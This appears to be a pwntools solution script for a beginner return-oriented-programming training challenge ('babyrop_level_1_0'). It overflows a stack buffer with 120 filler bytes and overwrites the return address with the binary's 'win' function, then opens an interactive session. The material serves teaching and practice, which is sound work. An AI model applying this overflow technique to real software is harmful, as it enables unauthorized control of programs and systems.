#!/usr/bin/python3

from pwn import *

"""
patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0
"""

context.binary = target = ELF("./babyrop_level_1_0", checksec=False)
r = process()

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*120
buf += p64(target.sym.win)
s(buf)

r.interactive()